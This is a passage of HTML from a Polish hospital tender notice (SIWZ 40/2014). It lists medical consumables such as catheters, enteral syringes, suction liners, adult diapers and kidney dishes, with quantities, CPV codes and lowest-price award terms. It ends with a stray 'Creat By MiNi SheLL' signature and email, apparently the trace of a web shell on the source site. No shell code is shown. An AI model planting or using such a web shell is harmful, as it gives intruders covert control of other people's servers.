2.	Igła do punkcji mostka 	150
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Cewniki, dreny, strzykawki,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 13
L.p.	Nazwa towaru-asortyment	Ilość
sztuk

1.	Przezskórny mikrocewnik 	20



2.	Cewnik pępkowy krótkoterminowy 	100
3.	Cewnik pępkowy długoterminowy 	10
4.	Pediatryczny dwuświatłowy cewnik 	10


5.	dwuświatłowy lekki dren 	100

6.	Rurka bez balonu do krótkotrwałej intubacji, 	50



7.	Rurka bez balonu, dwuświatłowa, 	50



8.	Strzykawka do żywienia enteralnego 	4000

9.	Bezpieczna sonda do dojelitowa 	25
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.12.00-2, 33.14.13.10-6, 33.14.16.40-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Wkłady workowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 14
L.p.	Nazwa towaru-asortyment	Ilość
sztuk
Wkłady workowe kompatybilne z systemem ssącym Serres będącym na wyposażeniu Zamawiającego. 
 
1.	pojemność 2000 ml	2500
2.	pojemność 3000 ml	1000
3.	pojemność 1000 ml	100
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pieluchomajtki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 15
L.p.	Nazwa towaru-asortyment	Ilość
sztuk

1.	Pieluchomajtki dla dorosłych, 	
27000

2.	Pieluchomajtki dla dorosłych, 	75000
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.77.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Myjki, kaczki, misy nerkowate.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 16
L.p.	Nazwa towaru-asortyment	Ilość
sztuk
1.	Myjka jednorazowego użytku do ciała. 	192000

2.	Kaczka męska tradycyjna 	3500

3.	Miska nerkowata 	6500
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com